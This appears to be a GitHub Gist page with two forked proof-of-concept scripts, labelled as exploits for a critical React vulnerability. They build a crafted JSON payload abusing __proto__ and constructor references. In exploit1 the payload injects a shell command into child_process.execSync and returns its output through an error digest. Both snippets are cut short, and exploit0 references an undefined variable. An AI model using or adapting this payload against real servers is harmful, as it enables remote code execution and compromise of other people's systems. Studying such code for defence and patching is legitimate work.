Razzul razzul

razzul / exploit1.js
Created December 16, 2025 09:12 — forked from akshaymarch7/exploit1.js
React Critical Vulnerability (CVSS 10.0) - exploit1 code
(async () => {
// === CONFIGURATION ===
const cmd = "touch iWasHere"; // The command you want to run
const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain)
console.log(`[*] Attempting to run command: ${cmd}`);
// 1. Construct the malicious payload
// This injects the command into a child_process.execSync call and throws the result in an error digest
const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('${cmd}').toString('base64');throw Object.assign(new Error('x'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}`;
razzul / exploit0.js
Created December 16, 2025 09:11 — forked from akshaymarch7/exploit0.js
React Critical Vulnerability (CVSS 10.0) - exploit0 code
(async () => {
// === CONFIGURATION ===
const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain)
console.log(`[*] Attempting to run command: ${cmd}`);
// 1. Construct the malicious payload
// This injects the command into a child_process.execSync call and throws the result in an error digest
const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"console.log('meowmeow')//","_formData":{"get":"$1:constructor:constructor"}}}`;